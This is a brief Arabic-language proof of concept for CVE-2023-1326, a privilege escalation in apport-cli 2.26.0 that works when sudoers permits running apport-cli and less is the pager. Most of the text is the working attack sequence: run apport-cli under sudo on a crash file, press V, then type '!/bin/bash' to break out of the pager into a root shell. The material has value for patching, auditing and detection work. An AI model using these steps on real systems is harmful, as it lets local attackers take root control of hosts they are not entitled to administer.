
هذا هو اختبار مفهوم خاص وأساسي للثغرة CVE-2023-1326
إثبات المفهوم لـ CVE-2023-1326 في apport-cli 2.26.0
هذه الثغرة هي تصعيد صلاحيات في apport-cli 2.26.0، مشابهة لـ CVE-2023-26604، تعمل هذه الثغرة فقط إذا تم التخصيص في sudoers:

تم العثور على هجوم تصعيد صلاحيات في apport-cli 2.26.0 والإصدارات السابقة وهو مشابه لـ CVE-2023-26604. إذا تم تكوين النظام بشكل خاص للسماح للمستخدمين غير المميزين بتشغيل sudo apport-cli، وتم تكوين less كمتصفح، ويمكن ضبط حجم الطرفية: يمكن للمهاجم المحلي تصعيد الصلاحيات.
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
press V (view report)
!/bin/bash
